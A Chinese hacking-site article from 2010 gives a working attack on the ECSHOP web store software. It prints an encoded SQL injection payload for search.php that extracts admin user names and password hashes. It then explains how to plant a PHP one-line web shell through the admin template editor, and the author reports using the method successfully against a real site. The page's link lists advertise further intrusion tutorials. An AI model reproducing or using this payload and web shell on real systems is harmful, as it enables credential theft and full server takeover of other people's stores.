首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
ECSHOP 搜索注入漏洞利用exp及后台拿shell
来源:http://hi.baidu.com/5427518/blog/ 作者:情 发布时间:2010-07-31  

这个是search.php exp 变种
search.php?
encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319

拿SHELL登陆后台/admin/ 输入用户密码模块管理-库项目管理-选择myship.lbi里插入<?php eval($_REQUEST['cmd'])?>

连接http://www.***.net/myship.php一句话

       我注入进一个后台,然后按照步骤尝试了一下,果真成功。如下步骤:

       

      点确定之后访问http://www.***.net/myship.php,看不出此网页有什么变化,然后我用lake2的两用一句话果然连接成功。如图:

       这个方法的原理据说是ECSHOP的smarty模板机制是允许直接执行php代码,从而导致漏洞产生。我的smarty没什么了解,不过会努力的。

       这个方法真的很好,再次领教了牛人的技术。只是发现网上没什么提这种方法的,所以我看到了就和大家分享下。


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·传递哈希入侵技术
·Z-BLOG后台getshell方法
·DEDECMS后台另类拿Shell方法
·利用Shift后门提权入侵服务器方
·帝国cms后台拿shell
·Windows文件系统漏洞-小漏洞,大
·丢掉NC,介绍一种新的上传shell
·php168新版后台模板拿shell
·寻找绝对隐蔽的后门的办法
·使用Adsutil.vbs脚本获取IIS配置
·cookie注射批量拿企业站
·Dump freebsd dir entries using
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved